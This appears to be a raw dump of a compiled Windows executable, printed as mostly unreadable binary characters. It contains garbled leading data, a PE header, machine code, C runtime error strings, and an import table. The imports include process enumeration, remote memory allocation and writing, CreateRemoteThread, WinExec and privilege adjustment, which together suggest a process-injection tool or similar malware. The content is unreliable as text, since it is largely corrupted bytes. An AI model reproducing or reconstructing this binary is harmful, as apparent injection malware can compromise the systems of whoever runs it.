@��]\:�4$  �������A��B���`�Y�B���Ӂ�ح������	MO���F�x��0�7!����������â��h��'����М��������5�����J��	������
���]����n���ρ��%������B����N�4$�  ������P�����O����F���"�&�՝ô�mWh��)����N�Kh� ����]�h%�����h�)����ӸO�h�+�����ֵh�,����Dh�0�۫��l��h�4�Ϋ��H`M�h8鿫���{���h�9鰫��p�h:=飫���hA阫�����hC銫���hE����}�ʻh�I�p���,6hOJ�d���ص��hK�V����h�N�K����$�h�S�=����,�h�W�0����u�h�[�"����h\����� 
th�\�	���e�h�`������,�AhQe����ޅhEf����ؽ��h�g�Ԫ��Q%h�k�Ǫ����h	n黪��߹h�r鮪��hw飪���Ph�w閪����
�!h|x釪��?�hz�{���0�h|�o���eedh����o����E0m����@5Pj��ف��'��~Z�����N�4$T�������I��ߕ0G́�M6k��ʍ��-�*�����Ɋy������ہ��v����CAa�K������F�H���ׁ�Y���M��֝�hߪ�x�>�����Ɯȃ4$T-8���5*�΁�?q��P������h�����J���O�����������Nˁ÷��q�������d��������ˁ��0�-_L�W΍�.+�p��V����֍���la�֝�@Zh�u�g�������H���XO����OABEɁ4$  ���ҁ�h�eR��/���	��E����M�����F����������c�wV����th��=���ô¼�����Ё�j���B��������ȁ4$U  E�����CJ�Ӎ�#�Z���j�����4�@��R>�E���.*X������΍����%���ׁ�ʙ����å�,ah���2������%����a>��R�<�����Ё��I����ڍ��N���s
�����S���������ލ�n����/V~5{�N����������ށ���N�׍��MS�σ4$G��\h�i��m������1�5�2Ѽ���n�4��-�=�458�������L�$�OI���ہ�tq(����E��H����J���A�4$�   ���}������FC�����߁Ǝ�����ύ�Øs��<h�,(�����ĺ���������������4$@����`������EC�ρ�+
�3����pځ�F��������EF����,\����ߝ�a`h�������r7Ü������M@N��IK��Ɂ4$�  ��.8������	�����W�����l��B�����ҁÐ�A݁�����O�����Ӂ�$H9����8)hia1T�����v.���������
��h_��d�dd��5ʌ\+�����iL5���8��ύ�������-����A������ٍ{P��ہÖ��F�4$�  �����ݍ��ǈ����E�@R����i��Ձ�?V�����O���ɜ����h�P�4�!���@r��:h-t�~�8����dݜ��5g�^��C5N�9�@������D��2��I��F����D��ڍ��p���́�"��!���߱�݁4$�   ���kR8��VF?́���.��S�Tk����7y�O�×h#������)h�뜍�����Ѝ����U���Ѝ����������JA�с� {\����A��������J���4$�   ���^␍��:fa����y�,��ٍ�AJ�ލ��<��G��������}�mh2+HP�����Rh=�[�{���hh�zQ�������bЬ���\�_鍀r��\��H���5Z�h��O����o�Ɂ��>���ρ�P�n;������I����R���:'n�с4$E  ���Д�󧈤�C��aqR����J����6E�E�þvh�[��y����
��H�����d����Hl�I�����Ё�6�����]�M��`�J����Bʃ4$A��
B������ρ�>�Fˍ��#��֍���=�����𧞁��iy>��Ӂ��6�?����;�����ÎF!�h�9�G�������������������������ȁ�R��&����z�����S�ǀ����ށ�������M�ݍ��z��J�4$�ӁÀ�^w���(���(7�E����ρ���@O���Ӂ����B@m���������h��z��������)����������2����I�����Ё¤ĺ́���U����h�,ׁ�R�a���I����������C��ہ4$�  ����ҁ�5����N�����l]�O���0,���˥h����q������Ё4$�   H��J�@�����������HJ����/|�����I��4.h���K�Kˁ�ˉ�K���N��
�Ս�\́��ld�����������7<F��́�J�
ڝÑ,Gd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   �   30�0�0�0�0 1111�1�1�1+2i2�2�2�23�3�3�3�3�3�34C4Y4l4y4�4�4�4�4 555585�5�5�5�5"6s6�6�6�6�6�6�6�6�6�6�6�6�6�6
7u8{8�8�8�8�8M9o9t9}9�9�9�9�9�:�:�:�:�:�:�:s;�;"<)<�<�<�<�<�<�<�<�<�<X>p>>?/?4?:???D?I?N?S?_?{?    X  �0�0�0�0�0�0 1�12C2I2N2W2]2b2g2s2�2�3�3�3�3�34.4�4�455%5/595?5D5P5l5�6�6�6�6�6�6'7y7�7�7�7�7�7�7
888!8(818=8D8L8S8_8y8�8�89&9s9�9�9�9;:U:�:�:�:�:;;;';1;@;U;d;s;�;�;�;�;�;�; <<<<&<0<7<<<E<P<_<e<q<{<�<�<�<�<�<�<�<�<�<�<�<�<�<�<====&=1=@=F=R=\=c=h=q=|=�=�=�=�=�=�=�=�=�=�=�=�=�=�=>>5>:>I>Z>`>g>o>v>}>�>�>�>�>�>?j?�?�?   0  �   \0m0�0�031l1q1(222<2C2J2Q2V2l2v2}2�2�2`4i4�4�677@7�7�7�7�78X8}8�8�8�8�8	99!9f9n9x9�9�9�9�9�9�9�9�9�9�9�9::::: :&:,:2:8:>:D:J:P:V:b:p:x:~:�:�:�:�:�:�:�:�:�:�:�:�:;&;8;�;�;�;�;<y<�<�=�>Q?�?�? @     0   P    ,10141@1\1d1l1t1|1�1�1�1�1�1�1�1�1�1�1�1�1�122,242<2D2L2T2\2d2l2t2|2�2�2�2�2�2�2�2�2�2�2�2�2�23333$303L3T3\3d3l3t3|3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�34444$4,444<4D4L4X4t4|4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�45$5,545<5D5L5T5\5d5l5t5|5�5�5�5�5�5�5�5�566  `     0�2 �    @0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0 11111111 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1 22222222 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2 33333333 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3 44444444 4$4(4,4044484<4                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MZ�       ��  �       @                                   �   � �	�!�L�!This program cannot be run in DOS mode.
$       ��ɋ����������׬�����׭����j����؋����������������Rich���                PE  L *wqH        �   @   @      0      P    @                      �                                       �T  <                                                                                    P  �                           .text   \:      @                    `.rdata  �	   P      P              @  @.data   �*   `   0   `              @  �                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        ��  VW�   �``@ ��$  3�󥤹/   ��$Q  �f���@   3��|$�D$   �D$��$  Ph?  j Qh  ��P@ �L$�T$�D$RPj j h��@ Q�P@ ��t&�0`@ ���3��T$���+����������ȃ��L$Q�P@ _�D$^��  Ð���������������D$ Pj(�PP@ P�P@ ��u	�   ��ËT$ �L$QRj � P@ �D$�L$j j �T$�D$�D$jRj P�D$$   �D$0   �L$,�P@ ���@��Ð��������SUVWh�`@ �r�������t_^]3�[ËD$Pj j*�P@ ����u_^][Ë\$�-(P@ jh   S��@Pj W�8P@ ����u_^][�j S��@PSVW�<P@ ��u_^][�h�`@ h�`@ �@P@ P�DP@ ��u_^][�j j VPj j W�HP@ ��_^�]��[Ð������������ �   3�SU�l$,VW�|$�|$��+��    ���t��P�N  ���7FKu�|$���3����+��ŋы������ʃ��_^][�� Ð��������(  SUVWj j��  ��D$PU�D$(  ��  ��tX��$<  �L$4Q�S��������ϊ���:�u��t�Q�^��:�u������u�3��������t�D$PU�  ��u�_^]3�[��(  ËD$_^][��(  Á�  S�4P@ VWjd����   �A   3��|$����������3��T$���+�j ���������ȃ��L$Q�0P@ j2��h�`@ ������؃���tWU��$  h  R�,P@ ��`@ ���3���$  ���+�S����������O���͍�$  ��P��l�����]_^[��  Ð�������������U��j�h�P@ hX@ d�    Pd�%    ��SVW�e�j j jj���   ���.�E�    �d@ j P��   ��4��   Ëe���E��������M�d�    _^[��]Ð��������% P@ �%$P@ �%LP@ U��Q�=��@  SVWu�E��A��   ��Z��   �� �   �]�   j;�^}%95c@ ~VS��  YY�
�a@ �X#ƅ�u���e�a@ �������DJ�t�e
 j�E�]	X�	�e	 �]��Vj �M�jQP�EPW�5��@ �  �� ��t�;�u�E���E��M����_^[�����U��SVWUj j hx@ �u��4  ]_^[��]ËL$�A   �   t�D$�T$��   �SVW�D$Pj�h�@ d�5    d�%    �D$ �X�p���t.;t$$t(�4v���L$�H�|� uh  �D��@   �T���d�    ��_^[�3�d�    �y�@ u�Q�R9Qu�   �SQ��`@ �
SQ��`@ �M�K�C�kY[� ��VC20XC00U���SVWU��]�E�@   ��   �E��E�E��E��C��s�{���ta�v�|� tEVU�k�T�]^�]�t3x<�{S�������kVS��������vj�D��a������C�T��{�v�4�롸    ��   �U�kj�S������]�   ]_^[��]�U�L$�)�AP�AP�y�����]� U��j�h�P@ hX@ d�    Pd�%    ��SVW�e��\P@ 3Ҋԉ̅@ �ȁ��   �ȅ@ ��ʉą@ �����@ j �l  Y��uj�   Y�e� �6
  �XP@ ���@ ��  ���@ �  ��  �T  �܅@ ���@ P�5ԅ@ �5Ѕ@ �<������E�P�Y  �E��	�M�PQ�  YYËe��u��K  �=��@ t�:  �t$�j  h�   �a@ YYÃ=��@ t�  �t$�E  Yh�   �`P@ �U��j�hQ@ hX@ d�    Pd�%    ��SVW�e�3�9=��@ uFWWj[ShQ@ �   VW�pP@ ��t���@ �"WWShQ@ VW�lP@ ���"  ���@    9}~�u�u�  YY�E���@ ��u�u�u�u�u�u�u�lP@ ��   ����   9} u���@ �E WW�u�u�E$�����@P�u �hP@ �؉]�;���   �}����$��  �e�ĉE܃M���jXËe�3��}܃M���]�9}�tfS�u��u�uj�u �hP@ ��tMWWS�u��u�u�pP@ ���u�;�t2�Et@9}��   ;u�u�uS�u��u�u�pP@ ����   3��eȋM�d�    _^[���E�   �6��$���  �e�܉]��M���jXËe�3�3ۃM���u�;�t�VS�u��u��u�u�pP@ ��t�9}WWuWW��u�uVSh   �u �dP@ ��;��q������l����T$�D$��V�J�t�8 t@��I��u�8 ^u+D$Ë��U��Q�E�H��   w�a@ �A�R��V�5a@ �����DV�^t�e� �M��E�j�	�e� �E�jX�M
jj j QP�E�Pj�  ����u���E
#E�á��@ ��t��h`@ h`@ ��   h`@ h `@ �   ���j j �t$�   ���j j�t$�   ���Wj_9=��@ u�t$�PP@ P�tP@ �|$ S�\$�=��@ ��@ u<���@ ��t"���@ V�q�;�r���t�Ѓ�;5��@ s�^h`@ h`@ �*   YYh `@ h`@ �   YY��[u�t$�=��@ �`P@ _�V�t$;t$s���t�Ѓ���^�U��S�u�5  ��Y�   �X���  ��u�` jX�  ����   � �@ �M�M� �@ �H����   ��c@ ��c@ �V;�}�4I+э4�0c@ �& ��Ju�� �5�c@ =�  �u��c@ �   �p=�  �u��c@ �   �]=�  �u��c@ �   �J=�  �u��c@ �   �7=�  �u��c@ �   �$=�  �u��c@ �   �=�  �u
��c@ �   �5�c@ j��Y�5�c@ Y^��` Q��Y�E� �@ ����	�u�xP@ []ËT$��c@ 9(c@ V�(c@ t�4I�4�(c@ ��;�s9u��I^��(c@ ;�s9t3��S3�9��@ VWu�  �5��@ 3��:�t<=tGV��  Y�t���   P��  ��Y;�5܅@ uj	����Y�=��@ 8t9UW�  ��YE�?=t"U�  ;�Y�uj	�����YW�6�
  Y��Y�8u�]�5��@ �$
  Y���@ �_^���@    [�U��QQS3�9��@ VWu�]  ��@ h  VS�|P@ ���@ �5�@ ��8t���E�P�E�PSSW�M   �E��M���P�  ����;�uj�I���Y�E�P�E�P�E���PVW�   �E���H�5ԅ@ _^�Ѕ@ [��U��M�ESV�! �uW�}�    �E��t�7���}�8"uD�P@��"t)��t%����a�@ t���t��F@���tՊ�F�����t�& F�8"uF@�C���t��F�@����a�@ t���t��F@�� t	��t	��	ū�uH���t�f� �e �8 ��   ��� t��	u@��8 ��   ��t�7���}�U��E   3ۀ8\u@C���8"u,��u%3�9}t�x"�Pu����}�}3�9U�U���K��tC��t�\F�Ku���tJ�} u
�� t?��	t:�} t.��t����a�@ t�F@���F�����a�@ t@��@�X�����t�& F�������t�' �E_^[� ]�QQ��@ SU�-�P@ VW3�3�3�;�u3�Ջ�;�t��@    �(��P@ ��;���   ��@    �   ����   ;�u�Ջ�;���   f9��t@@f9u�@@f9u�+Ƌ=dP@ ��SS@SSPVSS�D$4�׋�;�t2U�  ;�Y�D$t#SSUP�t$$VSS�ׅ�u�t$��  Y�\$�\$V��P@ ���S��uL;�u��P@ ��;�t<8��t
@8u�@8u�+�@��U�   ��Y;�u3��UWV�-  ��W��P@ ���3�_^][YYÃ�DSUVWh   ��  ��Y��uj����Y�5��@ ���@     ��   ;�s�f ���F
���@ ��   ��D$P��P@ f�|$B ��   �D$D����   �0�h�   ;��.|��95��@ }R���@ h   �U  ��Yt8���@  ���   ;�s�` ���@
�����   ���95��@ |���5��@ 3���~F����t6�M ��t.��uP��P@ ��t�ǋ���������@ �ȋ��M �HGE��;�|�3ۡ��@ �<���4�uM���F�uj�X�
��H������P��P@ �����tW��P@ ��t%�   �>��u�N@���u
�N��N�C��|��5��@ ��P@ _^][��D�V�t$j �& �@P@ f�8MZu�H<��t��H��@�F^�U��,  �1  ��h���SPǅh����   ��P@ ��t��x���u��l���rjX�  ������h�  Ph@Q@ ��P@ ����   3ۍ�����8�����t�<a|<z, �A8u퍅����jPh(Q@ �V  ����u�������I��d���h  PS�|P@ 8�d�����d���t�<a|<z, �A8u퍅d���P������P�  YY;�t>j,P�  Y;�Yt0@��8t�9;u��A8u�j
SP�S  ����t��t��t�E�P�����}�Y���[��3�j 9D$h   ��P��P@ ���h�@ t6�������l�@ uh�  �  Y�
��u��  ��u�5h�@ ��P@ 3��jXá��@ ��t��u*�=a@ u!h�   �   ��@ Y��t��h�   �   Y�U���  �U3ɸ�c@ ;t��A=Pd@ r�V����;��c@ �  ���@ ����   ��u�=a@ ��   ���   ��   ��\���h  Pj �|P@ ��u��\���h0T@ P��  YY��\���WP��\����c  @Y��<v)��\���P�P  ����\�����;j�h,T@ W�  ����`���hT@ P�r  ��`���WP�u  ��`���hT@ P�d  ���c@ ��`���P�R  h  ��`���h�S@ P�  ��,_�&�E���c@ j P�6��  YP�6j���P@ P��P@ ^���������������Q=   �L$r��   -   �=   s�+ȋą���@P�U��j�hHT@ hX@ d�    Pd�%    ��SVW�e��@ 3�;�u>�E�Pj^VhQ@ V��P@ ��t����E�PVhQ@ VS��P@ ����   jX��@ ��u$�E;�u���@ �u�u�u�uP��P@ �   ����   9]u���@ �ESS�u�u�E �����@P�u�hP@ �E�;�tc�]��< �ǃ�$�������e��u�WSV��  ���jXËe�3�3��M��;�t)�u�V�u�uj�u�hP@ ;�t�uPV�u��P@ �3��e̋M�d�    _^[��U��QV�u��tZ�l�@ ��uV�  Y��Vt6P�  YY�:��u&�EP�E�PV��  ����tP�u�u��"  ���Vj �5h�@ ��P@ ^�����������������W�|$�j��$    ���L$W��   t�A��t;��   u�����~Ѓ��3�� �t�A���t#��t�  � t�   �t�͍y���y���y���y��L$��   t�A��td�G��   u���������~�Ѓ��3��� �t��t4��t'��  � t��   �t�ǉ�D$_�f��D$�G _�f��D$_È�D$_��5(�@ �t$�   YYÃ|$�w"�t$�   ��Yu9D$t�t$�2  ��Yu�3�ál�@ V�t$��u;5H�@ w?V�I  ��Yt4^Ã�u-�D$��t�p����j^;5t�@ w����P��  ��Yu���uj^�����Vj �5h�@ ��P@ ^��������������̋L$��   t�A��t@��   u�    �����~Ѓ��3�� �t�A���t2��t$�  � t�   �t�͍A��L$+�ÍA��L$+�ÍA��L$+�ÍA��L$+��U���SVW�u�  ��Y;5L�@ �u�j  3�;��V  3ҸXd@ 90tr��0B=He@ r�E�PV��P@ ���$  j@3�Y�`�@ �}��5L�@ 󫪉d�@ ��   �}� ��   �M�����   �A���;���   ��a�@ @��j@3�Y�`�@ �4R�]������hd@ �; ��t,�Q��t%���;�w�U���Pd@ �a�@ @;�v�AA�9 u��E����}�r��E�\�@    P�L�@ ��   ��\d@ �P�@ ��Y�d�@ ��UAA�y� �H���jX��a�@ @=�   r�V�   Y�d�@ �\�@    ��\�@ 3��P�@ ����9�@ t�   �   3�����_^[�ËD$�%�@  ���u��@    �%�P@ ���u��@    �%�P@ ���u���@ ��@    ËD$-�  t"��t��tHt3�ø  ø  ø  ø  �Wj@Y3��`�@ �3��P�@ �L�@ �\�@ �d�@ ���_�U���  �E�VP�5L�@ ��P@ ���  3��   ������@;�r�E�ƅ���� ��t7SW�U��
��;�w+ȍ�����A�    �����˃��BB�B���u�_[j �������5d�@ �5L�@ P������VPj�6���j �������5L�@ VP������VPV�5d�@ �K���j �������5L�@ VP������VPh   �5d�@ �#�����\3�������f���t��a�@ ��������`�@ ���t��a�@  �������〠`�@  @AA;�r��I3��   ��Ar��Zw��a�@ �Ȁ� ��`�@ ���ar��zw��a�@  �Ȁ� ����`�@  @;�r�^�Ã=��@  uj��,���Y���@    ������U��WV�u�M�}�����;�v;��x  ��   u������r)��$�80@ �Ǻ   ��r����$�P/@ �$�H0@ ��$��/@ �`/@ �/@ �/@ #ъ��F�G�F���G������r���$�80@ �I #ъ��F���G������r���$�80@ �#ъ�F��G��r���$�80@ �I /0@ 0@ 0@ 0@ 0@ �/@ �/@ �/@ �D��D��D��D��D��D��D���D���D��D��D���D���D���D����    ���$�80@ ��H0@ P0@ \0@ p0@ �E^_�Ð���E^_�Ð���F�G�E^_�ÍI ���F�G�F�G�E^_�Ð�t1��|9���   u$������r����$��1@ �����$��1@ �I �Ǻ   ��r��+��$��0@ �$��1@ ��0@ 1@ 01@ �F#шGN��O��r�����$��1@ �I �F#шG�F���G������r�����$��1@ ��F#шG�F�G�F���G�������Z�������$��1@ �I �1@ �1@ �1@ �1@ �1@ �1@ �1@ �1@ �D��D��D��D��D��D��D��D��D��D��D��D��D��D���    ���$��1@ ���1@ �1@ �1@ 2@ �E^_�Ð�F�G�E^_�ÍI �F�G�F�G�E^_�Ð�F�G�F�G�F�G�E^_��j �t$�t$�t$�   ���U���S�e� VW�}��w�u��=c@ ~��jP�?���YY��a@ �ÊA����t�F�Ѐ�-�u�u�M���+u�F�u��E����  ����  ��$�z  j��Yu$��0t	�E
   �2�<xt<Xt	�E   ��M9Mu��0u�<xt<Xu�^FF�u����3��u�  �E�=c@ ��~jV����YY��a@ �p����t�˃�0�2�=c@ ~WV�W���YY��a@ f�p#ǅ�tJ��P��  Y�ȃ�7;Ms6�u��M;u�ru���3��u;�v�M�	�u�u��E��E���d����M�M��U��u��t�E�E��e� �M������u��u>��t	�}�   �w	��u,9E�v'�E���@ "   t�M����M�������ȉM���t�E���Et�E��؉E��E���E��t�83�_^[�������������̍B�[Í�$    �d$ 3��D$S�����T$��   t�
B8�tф�tQ��   u��W����V؋
����~����3���������3�3ƃ��� �u% �t�% u��   �u�^_[3�ËB�8�t6��t�8�t'��t���8�t��t�8�t��t��^_�B�[ÍB�^_[ÍB�^_[ÍB�^_[����̋L$WSV��|$��ti�q��tO���L$�F8�t��t�F8�t
��u�^[_3�ÊF8�u�~��a��t(���8�uĊA��t�f���8�t��3�^[_��������G�^[_Ë�^[_�U��WVS�M�&�ً}��3����ˋ��u�F�3�:G�wtII�ы�[^_��h@  j �5h�@ ��P@ ���D�@ uËL$�%<�@  �%@�@  j�8�@ �H�@ �0�@    Xá@�@ ���D�@ ��;�s�T$+P��   r����3��U����MSV�u�AW�����+y����i�  ��D  �M��I���M���  �1�1�U�V��U��U����]u~��J��?vj?Z�K;KuL�� s�   �����L��!\�D�	u(�M!�!�J�   ���L��!���   �	u�M!Y�M��]��M��S�[M�Z�U�M��Z�R�S����J��?vj?Z�]����]���   +u��]���j?�uK^;�v��M��щM���J;�v��;�tc�M�q;qu@�� s�   �������!t�D�Lu&�M!1��K�   �����!���   �Lu�M!q�M�q�I�N�M�q�I�N�u��]�}� u;���   �M��\��щ^�N�q�N�q�N;Nu`�L�� �M���Ls%�} u�   �����M	�   �����D�D	�)�} u�J�   ���M	Y�J�   ��ꍄ��   	�E���D0��E����   �<�@ ����   �4�@ �5�P@ ��H� �  h @  SQ�֋4�@ �<�@ �   ���	P�<�@ �4�@ �@����    �<�@ �@�HC�<�@ �H�yC u	�`��<�@ �x�uiSj �p�֡<�@ �pj �5h�@ ��P@ �@�@ �D�@ �����ȡ<�@ +ȍL�Q�HQP��  �E���@�@ ;<�@ v�m�D�@ �8�@ �E�=4�@ �<�@ _^[��U����@�@ �D�@ SV��W�<��E�}��H����M���I�� }�����M���u��������3���u�E��8�@ ��;߉]s�K�;#M�#��u��;]��]r�;]�uy��;؉]s�K�;#M�#��u����;�uY;]�s�{ u���]��;]�u&��;؉]s�{ u����;�u�8  �؅ۉ]tS��  Y�K��C�8�u3��  �8�@ �C�����U�t����   �|�D#M�#��u7���   �pD#U�#u�e� �HD֋u�u���   �E�#U�����#9�t�U���3�i�  ��D  �M�L�D#�u����   j #M�_��|��G���M�T��
+M���M���N��?~j?^;��  �J;Jua�� }+�   �����M��|8�Ӊ]�#\�D�\�D�u8�]�M�!�1�O�   ���M��|8����   ��!��]�u�]�M�!K��]�J�z�}� �y�J�z�y��   �M�|���z�J�Q�J�Q�J;Jud�L�� �M})���} �Lu�   �����	;�   �����M�	|�D�/���} �Lu�N�   ���	{�M�����   �N�   ���	7�M���t�
�L���M��u�эN�
�L2��u��ɍy�>u;<�@ u�M�;4�@ u�%<�@  �M���B_^[�á@�@ �0�@ VW3�;�u0�D�P��P�5D�@ W�5h�@ ��P@ ;�ta�0�@ �D�@ �@�@ �D�@ h�A  j���5h�@ �4���P@ ;ǉFt*jh    h   W��P@ ;ǉFu�vW�5h�@ ��P@ 3���N��>�~�@�@ �F����_^�U��Q�MSVW�q�A3ۅ�|��C����j?i�  Z��0D  �E��@�@��Ju��j��yh   h �  W��P@ ��u����   �� p  ;�w<�G�H�����  ����  �@��  ��������Hǀ�  �     �H�;�vǋE��O�  j_�H�A�J�H�A�d�D ����   �FC�������E�NCu	x�   �������!P��_^[�Ã=`e@ �SUVWu�Pe@ �h    j �5h�@ ��P@ �����  �-�P@ jh    h  @ j �Ջ�����   j�   h   SW�Յ���   �Pe@ ;�u�=Pe@  u�Pe@ �=Te@  u�Te@ ���Te@ �F�5Te@ �F�0��  @ ���   �F�F�N�~�F3��   3҃���J#�JE��H����   |�Sj W��  ���F�;�s���   ��G��G�   ��   �܋��'h �  j W��P@ ��Pe@ tVj �5h�@ ��P@ 3�_^][�V�t$h �  j �v��P@ 95p�@ u�F�p�@ ��Pe@ t �F�Vj ���N�H�5h�@ ��P@ ^Ã`e@ �^�U��QSV�5Te@ W�~���   �e� ��   � �? �?�   u9��h @  Fh   P��P@ ��t����@ �F��t;�v�~�E��Mt��   ����}��}� �΋vt,�y�u&j�A Z�8�uB����   |��   uQ� ���Y;5Te@ t
�} �P���_^[�ËD$�Pe@ V��;Av;Ar�	;�t7��u1��   ���  ;�r �t$��t$��f�� �+��+�^���D�3�^ËD$�L$+H���D��L$��! �8�   �@�   u��@ �=�@  uj����Y�U��QQSV�5p�@ W�V�����   �~��   ��+ƃ������;��E�s:��];�|9_vSQP�  ����uu�E��_����      ;��E�r���]�F�N�~�E�;��M�s3�;�|9_vSP�u��j  ����u&�_�E�   ��;}�r���]�6;5p�@ t�C����5p�@ )�~�(  �Pe@ ����t� u�?;���   ��_�e� ���+�������w�;�u�}�}���E��8�t�E�j��h   PV�E���P@ ;���   j �u�V�k  �U����ҋ�~0�F�U����   ��P�P���   ���A�      ���M�u։=p�@ ��   ;�s�9�t����;��#��G�E�F�_))F�L��   ��4�4�����t)�H�Y�T�p�@ ���   +ӉQ��)P��   �3�_^[��U��Q�M�USV�qW�9���   ;�}��ǉ]r!��;�s)Q�	�a �A��G��   ��> t�ƍ4;�sC���u0j�X^�; uCF��;�sN;E�u�q�)u9U��   �}������ƍ4;ur��q;�s~�;Esv���u@j�^X�; u%C@���;]s	+��q�	�a �q�1����6;�s)E9Ur4������맍;]s	+�A�	�a �A���Fk���+��3�_^[��S3�9�@ VWuBh�T@ ��P@ ��;�tg�5DP@ hxT@ W�օ���@ tPhhT@ W��hTT@ W� �@ �֣$�@ � �@ ��t�Ћ؅�t�$�@ ��tS�Ћ��t$�t$�t$S��@ _^[�3������������̋L$W��tzVS�ًt$��   �|$u��uo�!�F�GIt%��t)��   u����uQ��t�F�G��t/Ku�D$[^_���   t�GI��   ��   u����ul�GKu�[^�D$_É��It�����~�Ѓ��3��� �tބ�t,��t��  � t��   �uƉ�����  �����   ��3҉��3�It
3����Iu���u��D$[^_��̋T$�L$��tG3��D$W����r-�ك�t+шGIu������������ʃ���t��t�GJu��D$_ËD$á,�@ ��t�t$�Ѕ�YtjX�3��U��Q�=��@  Su�E��a��   ��z��   �� �   �]��   }(�=c@ ~jS����YY��a@ �X����u���k�a@ �������DJ�t�e
 �E�]	j�	�e	 �]jX�M�jj jQP�EPh   �5��@ �[����� ��t���u�E���E��M����[���U��WV�u�M�}�����;�v;��x  ��   u������r)��$�hH@ �Ǻ   ��r����$��G@ �$�xH@ ��$��G@ ��G@ �G@ �G@ #ъ��F�G�F���G������r���$�hH@ �I #ъ��F���G������r���$�hH@ �#ъ�F��G��r���$�hH@ �I _H@ LH@ DH@ <H@ 4H@ ,H@ $H@ H@ �D��D��D��D��D��D��D���D���D��D��D���D���D���D����    ���$�hH@ ��xH@ �H@ �H@ �H@ �E^_�Ð���E^_�Ð���F�G�E^_�ÍI ���F�G�F�G�E^_�Ð�t1��|9���   u$������r����$� J@ �����$��I@ �I �Ǻ   ��r��+��$�I@ �$� J@ �I@ 8I@ `I@ �F#шGN��O��r�����$� J@ �I �F#шG�F���G������r�����$� J@ ��F#шG�F�G�F���G�������Z�������$� J@ �I �I@ �I@ �I@ �I@ �I@ �I@ �I@ �I@ �D��D��D��D��D��D��D��D��D��D��D��D��D��D���    ���$� J@ ��J@ J@ (J@ <J@ �E^_�Ð�F�G�E^_�ÍI �F�G�F�G�E^_�Ð�F�G�F�G�F�G�E^_����%TP@                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      W  �V  �V  �V  �V  W      4V  BV  RV  (V  �V  �V  �V  V   V  �U  �U  �U  dV  �U  :W  FW  XW  fW  tW  �W  �W  �W  �W  �W  �W  X   X  :X  RX  lX  ~X  �X  �X  �X  �X  �X  �X  �X  Y  Y  Y  ,Y  >Y  JY  VY  `Y  lY  |Y  �Y          ����R@ X@     �����@ @             ����h@ l@ ����@  @ __GLOBAL_HEAP_SELECTED  __MSVCRT_HEAP_SELECT    runtime error   
  TLOSS error
   SING error
    DOMAIN error
  R6028
- unable to initialize heap
    R6027
- not enough space for lowio initialization
    R6026
- not enough space for stdio initialization
    R6025
- pure virtual function call
   R6024
- not enough space for _onexit/atexit table
    R6019
- unable to open console device
    R6018
- unexpected heap error
    R6017
- unexpected multithread lock error
    R6016
- not enough space for thread data
 
abnormal program termination
    R6009
- not enough space for environment
 R6008
- not enough space for arguments
   R6002
- floating point not loaded
    Microsoft Visual C++ Runtime Library    

  Runtime Error!

Program:    ... <program name unknown>  ����(@ (@ GetLastActivePopup  GetActiveWindow MessageBoxA user32.dll  �T          �V  P  �T          ,W   P                       W  �V  �V  �V  �V  W      4V  BV  RV  (V  �V  �V  �V  V   V  �U  �U  �U  dV  �U  :W  FW  XW  fW  tW  �W  �W  �W  �W  �W  �W  X   X  :X  RX  lX  ~X  �X  �X  �X  �X  �X  �X  �X  Y  Y  Y  ,Y  >Y  JY  VY  `Y  lY  |Y  �Y      � GetCurrentProcess F CreateRemoteThread  >GetProcAddress  &GetModuleHandleA  �WriteProcessMemory  �VirtualAllocEx  lstrlenA  �OpenProcess �Process32Next �Process32First  L CreateToolhelp32Snapshot  YGetSystemDirectoryA �WinExec �Sleep KERNEL32.dll  [RegCloseKey {RegQueryValueExA  rRegOpenKeyExA  AdjustTokenPrivileges � LookupPrivilegeValueA BOpenProcessToken  ADVAPI32.dll  /RtlUnwind � GetCommandLineA tGetVersion  } ExitProcess �WideCharToMultiByte �MultiByteToWideChar �LCMapStringA  �LCMapStringW  �TerminateProcess  �UnhandledExceptionFilter  $GetModuleFileNameA  � FreeEnvironmentStringsA � FreeEnvironmentStringsW GetEnvironmentStrings GetEnvironmentStringsW  mSetHandleCount  RGetStdHandle  GetFileType PGetStartupInfoA 	